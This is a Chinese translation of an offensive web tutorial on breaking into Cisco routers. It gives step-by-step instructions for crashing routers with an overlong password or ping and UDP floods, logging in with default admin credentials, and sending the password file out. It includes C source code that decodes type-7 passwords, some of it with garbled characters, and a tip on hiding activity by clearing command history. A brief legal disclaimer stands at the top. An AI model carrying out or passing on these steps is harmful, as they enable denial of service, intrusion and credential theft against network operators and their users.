原文來自BlackSun，夢醒時分翻譯。這是一篇非常好的文章，很高興能和大家共享！

警告：

不要用這破壞cisco系統(tǒng)，或非法訪問系統(tǒng)。這篇文章只是以學習為目的。只可以用在合法行為，不能破壞任何系統(tǒng)。這篇文章將一步一步的向你展示如何利用發(fā)現(xiàn)的缺陷來獲得非法訪問。如果你攻入了一個cisco路由器，或者擾亂了系統(tǒng)，將會中斷數(shù)百個網(wǎng)絡客戶機，造成大量損失。所以，只可以在被允許的情況下進行，否則你將會有許多麻煩！

----------------------------------------------------------------------------------------------

目錄:

----------------------------------------------------------------------------------------------

在你看之前需要了解的:

－什么是IP地址？

－什么是ISP？

－什么是TCP/IP數(shù)據(jù)包？

－怎樣隱藏你的IP地址？

－怎樣使用Telnet？

－怎樣使用HyperTerminal？

－怎樣使用Ping？

－怎樣使用TraceRoute？

－怎樣使用代理服務器？

----------------------------------------------------------------------------------------------

－第一段：為什么攻擊cisco路由器？

－第二段：怎樣找到一個cisco路由器？

－第三段：怎樣闖入一個cisco路由器？

－第四段：怎樣破解密碼？

－第五段：怎樣使用一個cisco路由器？

----------------------------------------------------------------------------------------------

你看之前需要了解的知識：

----------------------------------------------------------------------------------------------

什么是IP地址？

IP是Internet Protocol的縮寫,電腦通過IP地址來識別網(wǎng)絡中的其它電腦，與其連接。這就是你為什么會在IRC中被踢走，并且找到你的ISP和你的大概位置。IP地址是很容易得到的，基本上可以由以下幾種方法

獲得：

-你訪問某網(wǎng)站,你的IP被記錄

-在IRC中,某人得到你的IP地址

-在ICQ，OICQ中,可以簡單的得到你的IP地址，使用一些小工具。

-如果你的電腦和某人連接起來，運行 systat即可看到和那些電腦連接（以IP地址顯示）

-某人發(fā)給你一封用java程序?qū)懙泥]件，可以得到你的IP地址

還有其它許多方法得到IP地址，包括使用一些木馬和后門程序。

-----------

什么是ISP？

ISP是Internet Service Provider的縮寫,你通過它們連接到internet.你撥號后就會連接和其連接。我們可以運行一個traceroute（跟蹤路徑）來尋找我們的ISP（traceroute 在后面還會介紹).

你應該看到像這樣:

tracert 222.222.22.22

Tracing route to [221.223.24.54]

over a maximum of 30 hops.

1 147ms 122ms 132ms your.isp [222.222.22.21]<<<你的ISP

[1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責任編輯：csh 

2 122ms 143ms 123ms isp.firewall [222.222.22.20]<<Preferences。你可以在這改變緩沖區(qū)的大小。

你也可以 打開/關閉 "local echo"。如果你打開了"local echo"，你的電腦將顯示你輸入的任何東西，并且連接上的電腦將顯示回應。

所以你將會看到就像這些：

你輸入 "hello",你看到的是

hhelelollo

這是因為返回的信息和你輸入的內(nèi)容已經(jīng)混合起來了。我這樣做的唯一的原因是看連接的機器對我的輸入，是否產(chǎn)生回應。

在默認的情況下，telnet只會通過telnet端口連接，即是斷口23。你并不會只通過端口23連接，所以你連接的時候，你可以任意改變端口。你可以改成25，那是郵件服務程序的端口。也可以是21，那是ftp的端口?？偣灿猩锨€端口，所以你要選擇正確的端口！

-----------------------------------------------------------------------------------------------

怎樣使用超級終端？

超級終端可以讓你的電腦的任意端口進行監(jiān)聽某臺電腦，如果有信息來到這個端口，就可以進行傳輸件。超級終端在 開始>程序>附件>通訊 中，沒有的話，你可以通過控制面板中安裝。首先，你要選擇連接協(xié)議，我們選"TCP/IP Winsock"，接著輸入要連接的電腦，下面選擇端口?？梢赃x擇Call>Wait for Call，來等待文件。這樣其它的電腦就可以通過某個端口連接上你了，你也可以聊天，或者傳送文件了。

:我的超級終端可能不一樣，沒有這個功能。

----------------------------------------------------------------------------------------------

怎樣使用Ping？

Ping的使用很簡單，在MS-DOS方式下，輸入“ping IP地址”，默認是ping三次，你也可以自己設定。

"ping ip地址 -t"可以使其不停的ping。

改變 ping 的大小可以這樣做:"ping -l (size) ip.address"

ping其實是向遠程的機器發(fā)送數(shù)據(jù)包，遠程的機器接收到就會把數(shù)據(jù)包原路返回，我們可以看到這個過程的時間。時間越短，速度就越快，當然，擁擠的時候，就會發(fā)生數(shù)據(jù)包丟失。 Ping 會減慢被ping的電腦的速度，流量過大的時候，甚至使其down機。一分鐘的ping攻擊就可以使一臺win98的電腦崩潰。(因為它的連接緩沖區(qū)溢出 - 連接過量，所以Windows決定休息休息了:>).ping攻擊也會占用你許多帶寬，所以你的帶寬要

比目標機器大(除非目標機器運行的是Windows 98，而且你有個不錯的貓，那么一分鐘內(nèi)，你就可以叫它下臺).

Ping攻擊對強壯的系統(tǒng)沒有效果。

注意: DOS's -t 選項不是一個ping攻擊,它只是很小的連接一下，而且中間有很多間隔。在Unix或Linux的機器中，你可以用上參數(shù) －f 進行真正的ping攻擊。其實，如果你的分布是POSIX-compliant (POSIX -Portable Operating System Interface based on uniX)，否則那就不是真正的Unix/Linux 分布。那么如果你有個 OS，稱自己既是Unix，又是Linux，那么就是有 －f 。

-----------------------------------------------------------------------------------------------

怎樣使用TraceRoute？

要跟蹤你的連接（可以觀察到目標機器的連接路線），只要在MS-DOS方式下，輸入“tracert IP地址”。你將會看到一個電腦的目錄，就是你和目標之間通過的機器。.

你可以用此方法確定是否存在防火墻，也可以確定某人的ISP(internet service provider)。

要確定ISP，只要看目標機器的前一個IP地址，那就應該是ISP的路由器。

基本上說，這就是traceroute怎樣工作－一個 TCP/IP 數(shù)據(jù)包，在它的頭部有一個值(在IP的頭部。如果你不知道這是什么意思，沒關系，你接著往下看就可以了)稱作 TTL,它是Time To Live的縮寫。當一個數(shù)據(jù)包通過路由器的時候，它的TTL值就會減少。這樣可能會使數(shù)據(jù)包在網(wǎng)絡中流竄，消耗帶寬。所以每當一個數(shù)據(jù)包TTL值達到0的時候，它就會失效并且因為一個ICMP錯誤返回到發(fā)送者?，F(xiàn)在traceroute 先發(fā)送一個TTL值為1的數(shù)據(jù)包，那么它很快就會返回。查看ICMP錯誤的頭部，traceroute就可以知道數(shù)據(jù)包第一步通過哪。接著就會發(fā)送TTL值為2的數(shù)據(jù)包，返回后，就是第二次通過的地方。依次下去，直到最終的目的地，就可以知道整個路徑。

上一頁  [1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責任編輯：csh 

現(xiàn)在你是不是明白了呢? :-)

----------------------------------------------------------------------------------------------

怎樣使用代理服務器？

在網(wǎng)上尋找一個代理服務器，包括你需要的打開的端口的代理服務器。找到后，你可以用telnet 或hyperterminal通過代理服務器連接到另外一臺電腦上。這樣做對方的電腦就不可以確定你的IP地址。

----------------------------------------------------------------------------------------------

第一段：為什么攻擊cisco路由器？

你可能會想.. 為什么要攻擊 cisco 路由器呢?

答案就是那樣做將對闖入其它的系統(tǒng)非常有用...

Cisco路由器非常的快，在一個系統(tǒng)中，一些會是以18 T1連接。而且它們非常靈活，盡管大多數(shù)運行telnet，但是它們可以在DoS攻擊或攻入其它系統(tǒng)時發(fā)揮作用。

它們同時還會有成千的數(shù)據(jù)包通過。但是可以被捕獲進行譯碼...許多的cisco路由器受托于系統(tǒng)，它們可以讓你獲得其網(wǎng)絡中訪問其它電腦的確切的數(shù)量。

-----------------------------------------------------------------------------------------------

第二段：怎樣找到一個cisco路由器？

尋找一個cisco路由器可以說是以項簡單的任務，幾乎所有的ISP至少通過一個cisco路由器。最簡單的方法是在dos下運行tracert，你可以跟蹤到電腦之間的許多電腦，在這之間，必有一個 “cisco”這個名字。如果你發(fā)現(xiàn)了，記下它的IP地址。

:在中國未必有cisco這個名字，但是肯定有路由器的，你可以用SuperScan掃描前兩個IP地址，看哪個開2001端口（Cisco路由器管理）和23端口即是的啦！

現(xiàn)在，你有cisco路由器的位置了，但是它可能還有一個防火墻保護它，所以你要檢查一下它是否被封鎖ping連接的次數(shù)，如果有回應，它就有可能未被封鎖。另外一種方法就是試著訪問cisco路由器的一些

端口。你用telnet即可，端口23，如果它要輸入密碼，未叫輸入用戶名，你就可能在一個防火墻。

試著找一個未受防火墻保護的路由器，因為這篇教程主題是路由器，不是教你怎樣通過防火墻。當你確信找到一個好的系統(tǒng)，你應該找一個可以使用23端口的代理服務器，這樣你的IP地址就不會被路由器記

錄下來了。:找到一臺運行Wingate的機器即可。

-----------------------------------------------------------------------------------------------

第三段：怎樣闖入一個cisco路由器？

Cisco路由器運行 V4.1 版本的軟件（現(xiàn)在普遍使用的），這很容易干掉。你只要通過代理服務器連接到一個cisco路由器，輸入一串很長的密碼，如：

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

現(xiàn)在開始等，cisco系統(tǒng)將會重新啟動，可以說你已經(jīng)攻擊它，使它離線了...但是過2-10分鐘，它就會恢復，我們應該進入它。

如果什么都沒發(fā)生,那么它運行的不是脆弱的軟件,你可以多試幾種DoS攻擊，比如大量的 ping.到dos下，輸入 "ping -l 56550 cisco.router.ip -t",這會起到同樣的效果.

:很有可能以上兩種方法都不行，反正是要其down機，那么試試那個攻擊yahoo的udpFlood，一定可以使其down機。一定要注意小心?。∥蚁嘈拍銘撝涝撛趺幢Ｗo自己。

上一頁  [1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責任編輯：csh 

如果它被動結(jié),就另找一個代理服務器進行連接。并且用戶名為"admin"，密碼為"admin"，因為這是默認的。

因為當它暫時的disabled，它將恢復到默認狀態(tài)。

:你到我主頁，會有一篇文章包括幾乎所有的路由器的默認用戶名和密碼。

現(xiàn)在，你已經(jīng)進入了，你應該獲得密碼文件！系統(tǒng)運行不同的軟件，但大部分有個像"htl-textil"這類的提示，現(xiàn)在輸入"?"，觀看命。你會看到有很多的命令，你會發(fā)現(xiàn)一個傳送命令，用這個命令，在當前Admin用戶的情況下，把密碼文件發(fā)送到你的電腦23端口上。但是在這之前，你要把你的超級終端設定好。你發(fā)送文件之后，超級終端將問你是否接收文件，你選擇是并保存在電腦中即可。離線. 你通過了最難的部分，下面準備開始破解密碼。

-----------------------------------------------------------------------------------------------

第四段：怎樣破解密碼？

現(xiàn)在，你獲得了密碼文件，你要破解它才能繼續(xù)進入路由器。所以你可以運行John the Ripper之類的軟件破譯它。

這是我推薦的最簡單的方法.另一種方法是試著把它解碼。這樣做需要一個解碼軟件，使用某些解碼軟件，你還要有足夠的耐心。

這兒有一個專門為cisco路由器密碼文件解碼的軟件，你可以在Linux中編譯它:

#include

#include

char xlat[] = {

0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,

0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,

0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44

};

char pw_str1[] = "password 7 ";

char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)

char *enc_pw;

char *dec_pw;

{

unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)

return(-1);

seed = (enc_pw[0] - ?') * 10 + enc_pw[1] - ?'

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))

return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {

if(i !=2 && !(i & 1)) {

dec_pw[i / 2 - 2] = val ^ xlat[seed++];

val = 0;

}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {

val += enc_pw[i] - ?'

continue;

}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {

val += enc_pw[i] - 'A' + 10;

continue;

}

if(strlen(enc_pw) != i)

上一頁  [1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責任編輯：csh 

return(-1);

}

dec_pw[++i / 2] = 0;

return(0);

}

usage()

{

fprintf(stdout, "Usage: %s -p \n", pname);

fprintf(stdout, " %s \n", pname);

return(0);

}

main(argc,argv)

int argc;

char **argv;

{

FILE *in = stdin, *out = stdout;

char line[257];

char passwd[65];

unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)

{

if(argc > 3) {

usage();

exit(1);

}

if(argv[1][0] == '-')

{

switch(argv[1][1]) {

case 'h':

usage();

break;

case 'p':

if(cdecrypt(argv[2], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

fprintf(stdout, "password: %s\n", passwd);

break;

default:

fprintf(stderr, "%s: unknow option.", pname);

}

return(0);

}

if((in = fopen(argv[1], "rt")) == NULL)

exit(1);

if(argc > 2)

if((out = fopen(argv[2], "wt")) == NULL)

exit(1);

}

while(1) {

for(i = 0; i < 256; i++) {

if((line[i] = fgetc(in)) == EOF) {

if(i)

break;

fclose(in);

fclose(out);

return(0);

上一頁  [1] [2] [3] [4] [5] [6] 下一頁  

文章錄入：csh    責任編輯：csh 

}

if(line[i] == '\r')

i--;

if(line[i] == '\n')

break;

}

pw_pos = 0;

line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))

pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))

pw_pos = strlen(pw_str2);

if(!pw_pos) {

fprintf(stdout, "%s\n", line);

continue;

}

if(cdecrypt(&line[pw_pos], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

else {

if(pw_pos == strlen(pw_str1))

fprintf(out, "%s", pw_str1);

else

fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);

}

}

}

如果你沒有使用Linux，你就只好用John the Ripper之類的軟件，帶上密碼檔，進行暴利破解。

-----------------------------------------------------------------------------------------------

第五段：怎樣使用一個cisco路由器？

要使用它，你先必須連接到它，你可以用代理，以免你的IP地址被記下。當你進入的時候，如果你想關閉歷史記錄來掩蓋你的行為，你只要輸"terminal history size 0"。這樣就不會被記下什么了! 輸入 "?"來看路由器中的命令，大多數(shù)你都可以用的。

這些路由器一般都有telnet，所以你可以通過telnet連接到其它的系統(tǒng)上(比如unix boxes)，并且攻擊它們。你還可以使用ping 和 traceroute 進行跟蹤系統(tǒng)或進行DoS攻擊。你也可以監(jiān)聽數(shù)據(jù)包，但我不推薦這樣做，因為并不是一定成功，而且會被發(fā)現(xiàn)....

----------------------------------------------------------------------------------------------

如果你第一次沒有攻入cisco，不要擔心...你一兩次是不可能成功的。它需要不斷的練習和超強的耐力。

這兒只向你將怎樣做...一定要在合法的情況下進行??！

----摘自“安盟”

上一頁  [1] [2] [3] [4] [5] [6] 

文章錄入：csh    責任編輯：csh 

最新評論